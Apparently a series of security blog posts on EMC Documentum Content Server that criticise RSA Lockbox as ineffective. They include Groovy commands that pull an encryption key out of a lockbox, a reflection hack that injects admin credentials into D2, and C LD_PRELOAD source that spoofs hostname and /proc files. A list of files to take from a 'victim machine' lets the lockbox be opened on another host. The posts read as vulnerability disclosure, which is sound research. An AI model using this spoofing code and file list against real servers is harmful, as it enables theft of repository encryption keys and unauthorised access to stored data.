Say goodbuy LockBox

Imagine that you are a bloody idiot and trust everything what EMC write in their Documentation and, so, when installing content server you have chosen to use LockBox option. The problem is LockBox does protect nothing and, moreover, it is sensitive to machine configuration (MAC address, ip address, hostname, CPU), so, at one point you will get something like:

[dmadmin@demo-server ~]$ cat /opt/dctm/dba/log/MyRepo.log
The Lockbox stable value threshold was not met because the system fingerprint has changed. 
 To reset the system fingerprint, open the Lockbox using the passphrase.
The Lockbox stable value threshold was not met because the system fingerprint has changed. 
 To reset the system fingerprint, open the Lockbox using the passphrase.
2016-11-06T01:04:35.281642	2325[2325]	0000000000000000	[DM_CRYPTO_F_KEYSTORE_INIT]
 fatal: "Failed to initialize keystore at /opt/dctm/dba/secure/aek.key. Internal error ..."

[dmadmin@demo-server ~]$ 

What to do? Actually, EMC released a special utility (dm_crypto_manage_lockbox) which allows to reset system fingerprints in LockBox, but there is another option – remove LockBox completely and switch to the old good aek.key, all what we need is:

  • LB.jar, LBJNI.jar from D2 installation
  • groovy shell

old server.ini:

##############################
#RKM configuration parameters
crypto_mode = AES256_RSA1024_SHA256
crypto_keystore = Local
crypto_lockbox = lockbox.lb
crypto_keyname = aek.key
#Above values cannot be changed once docbase is created

groovy magic:

[dmadmin@demo-server ~]$ ls /opt/dctm/dba/secure
ldapdb  lockbox.lb  lockbox.lb.bak  lockbox.lb.bak.FCD  lockbox.lb.FCD

[dmadmin@demo-server ~]$ export CLASSPATH=$CLASSPATH:LB.jar:LBJNI.jar
[dmadmin@demo-server ~]$ ./groovy-2.4.7/bin/groovysh \
> -Dclb.library.path=/home/dmadmin/lib/native/linux_gcc34_x64
Groovy Shell (2.4.7, JVM: 1.7.0_17)
Type ':help' or ':h' for help.
-----------------------------------------------------------------------------
groovy:000> import com.emc.clb.LockBox
===> com.emc.clb.LockBox
groovy:000> lb = new LockBox("/opt/dctm/dba/secure/lockbox.lb","Password@123")
===> com.emc.clb.LockBox@54f02243
groovy:000> new File("/home/dmadmin/aek.key").withOutputStream{
groovy:001> it.write lb.retrieveItemAsBinary("aek.key")
groovy:002> }
===> null
groovy:000>
[dmadmin@demo-server ~]$ ls -la aek.key 
-rw-rw-r--. 1 dmadmin dmadmin 144 Nov  6 01:19 aek.key
[dmadmin@demo-server ~]$ mv aek.key /opt/dctm/dba/secure/
[dmadmin@demo-server ~]$ dm_crypto_change_passphrase \
> -location /opt/dctm/dba/secure/aek.key \
> -passphrase Password@123 -noprompt

Please wait, this will take a few seconds
Successfully changed passphrase for AEK located at /opt/dctm/dba/secure/aek.key

new server.ini:

##############################
#RKM configuration parameters
crypto_mode = AES256_RSA1024_SHA256
crypto_keystore = Local
#crypto_lockbox = lockbox.lb
crypto_keyname = aek.key
#Above values cannot be changed once docbase is created

Q & A. X

Q:

Hi,
I am trying to write a standalone DF/D2 program. I create a DFC session and then make it in D2 context by D2Session.initTBO. I think perform normal DFC set, save operation on a sysobject. When I try to apply a D2 configuration like D2AuditConfig.apply I get the below error How to correct this??

ERROR 1 – D2 lockbox file or D2Method.passphrase property within it could not be found.
Exception in thread “main” DfException:: THREAD: main; MSG: Impossible to decrypt the method server response; ERRORCODE: ff; NEXT: null
at com.emc.d2.api.methods.D2Method.start(D2Method.java:417)

A:

You have two options:

  • put and setup all Lockbox stuff onto client side
  • Take advantage of reflection:
    Field ticketField = D2Session.class.getField("s_ticket");
    ticketField.setAccessible(true);
    Map tickets = (Map) ticketField.get(null);
    tickets.put("docbase_name", "dmadmin_password");
    

Q:

Also, cant it disable Lockbox altogether in 7.2+D24.5 environment?

A:

Download latest (or m.b. previous to latest or so) service pack for D2 4.2, extract com.emc.common.java.crypto.AESCrypto class from C6-Common-4.2.0.jar, insert it into C6-Common-4.5.0.jar.

RSA Lockbox magic :)

As was promised previously

Preparing RSA Lockbox on victim machine:

[dmadmin@docu72cs dba]$ dm_crypto_create -lockbox lockbox.lb \
> -lockboxpassphrase WSX@234edc \
> -keyname CSaek -passphrase QAZ123wsx

** Will use default algorithm **

Please wait. This will take a few seconds ...
** Successfully created key store 
     /u01/documentum/dba/secure/CSaek using algorithm AES_128_CBC
Key - CSaek uses algorithm AES_128_CBC.

Lockbox: Created /u01/documentum/dba/secure/lockbox.lb.
Created key CSaek


[dmadmin@docu72cs dba]$ ipcs

------ Shared Memory Segments --------
key        shmid      owner      perms      bytes      nattch     status
0x000005d1 807206912  dmadmin    640        1024       0

------ Semaphore Arrays --------
key        semid      owner      perms      nsems

------ Message Queues --------
key        msqid      owner      perms      used-bytes   messages



[dmadmin@docu72cs dba]$ dm_encrypt_password -lockbox lockbox.lb \
> -passphrase QAZ123wsx -keyname CSaek \
> -docbase D72 -rdbms -encrypt d72

** Successfully encrypted password in dbpasswd.txt file

[dmadmin@docu72cs dba]$ ./dm_start_D72
starting Documentum server for repository: [D72]
with server log: [/u01/documentum/dba/log/D72.log]
server pid: 4421

[dmadmin@docu72cs dba]$ head /u01/documentum/dba/log/D72.log
.... [DM_SERVER_I_START_SERVER]info:  "Docbase D72 attempting to open"

.... [DM_SERVER_I_START_KEY_STORAGE_MODE]info:  
         "Docbase D72 is using database for cryptographic key storage"

Opening RSA Lockbox on another machine:

Related source code:

#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/utsname.h> 

static int (*orig_open)(char *, int) = NULL;
static int (*orig_uname) (struct utsname * buf);


int open(char * filename, int flags) {
 if (orig_open == NULL)
  orig_open = dlsym(RTLD_NEXT, "open");

 if (strcmp(filename, "/proc/version") != 0 
  && strcmp(filename, "/proc/swaps") != 0
  && strcmp(filename, "/proc/cpuinfo") != 0 
  && strcmp(filename, "/proc/partitions") != 0) {
  return orig_open(filename, flags);
 }
    
 char * home = getenv("PROC_PATH");

 if (!home) {
  return orig_open(filename, flags);
 }

 size_t newfilename_len = strlen(filename) + strlen(home) + 1;
 char * newfilename = (char*) malloc(newfilename_len);
 memset(newfilename, 0, sizeof(newfilename));
 strncat(newfilename, home, strlen(home));
 strncat(newfilename, filename, strlen(filename));
 int ret = orig_open(newfilename, flags);
 free(newfilename);
 return ret;
}

int uname(struct utsname *buf) {
 if (orig_uname == NULL)
  orig_uname = dlsym(RTLD_NEXT, "uname");

 int ret = orig_uname(buf);
 char * fakename = getenv("FAKENAME");

 if(!fakename) {
  return ret;
 }
 memset(buf->nodename, 0, sizeof(buf->nodename));
 strncpy(buf->nodename, fakename, sizeof(buf->nodename) - 1); 
 return ret;
}

New joke about security from EMC

Today EMC announced new security advisory:

According to release notes Content Server got following security “improvements” in 7.2:

I have no idea what does mean “dm_crypto_boot utility is enhanced to load an AEK into the shared memory” because this capability exists for a long time in Content Server, for example, quote from Admin Guide 6.7:

so, “dm_crypto_boot utility is enhanced to load an AEK into the shared memory” is not a security enhancement (actually, folks said me that now installer enforces entering passphrase for aek.key during installation), and the only enhancement is a support of RSA Lockbox, moreover, according to EMC it is the only option to “prevent” aek.key file from hijacking, but if you read carefully my post about CVE-2014-2515, you should know that RSA Lockbox does not introduce any security features – to open RSA Lockbox on another machine it’s enough to hijack following files from victim machine:

  • /etc/sysconfig/network – to get hostname
  • /etc/udev/rules.d/70-persistent-net.rules – to get information about network interfaces
  • /etc/sysconfig/network-scripts/ifcfg-*, /var/lib/dhclient/dhclient*.leases – to get more information about network interfaces
  • /proc/version, /proc/swaps, /proc/cpuinfo, /proc/partitions – RSA Lockbox uses these files to bind itself to specific machine

In next post I’m going to demonstrate how does it work.